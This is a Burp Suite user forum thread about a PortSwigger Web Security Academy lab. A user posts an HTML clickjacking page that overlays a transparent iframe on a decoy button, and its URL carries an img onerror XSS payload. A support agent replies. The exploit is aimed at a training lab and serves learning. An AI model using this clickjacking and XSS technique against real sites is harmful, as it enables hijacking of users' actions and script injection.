Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Exploiting clickjacking vulnerability to trigger DOM-based XSS - Invalid CSRF token

paulorz | Last updated: Feb 29, 2024 04:11PM UTC

Hi, how's everyone doing? I have been trying to solve this lab, but when doing the clickjacking, the form throws the following error: "Failed to submit feedback: "Invalid CSRF token (session does not contain a CSRF token)". Just wanted to let people know that even though the exploit was not functioning correctly on Burp Browser, the attemp on Mozilla did :) This is my attemp to a solution for the lab: <html> <head> <style> #target_website { position:relative; width:800px; height:850px; opacity:0.00001; opacity:0.5; z-index:2; } #decoy_website { position:absolute; width:300px; height:400px; z-index:1; top: 800px; left: 80px; } </style> </head> <body> <div id="decoy_website"> <button type="submit" > Click me </button> </div> <iframe id="target_website" src="https://0aab0044038091888ccd8bb6000500ae.web-security-academy.net/feedback?name=%3Cimg%20src=1 onerror=print()%3E&email=agus@agus.com&subject=asd&message=asd"> </iframe> </body> </html>

Ben, PortSwigger Agent | Last updated: Mar 01, 2024 01:40PM UTC

Hi, I have just run through this particular lab and was able to solve it using the written solution in conjunction with Burp's browser in the 2024.1.1.3 version of Burp. Are you able to clarify what the exploit that returns that particular error looks like?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.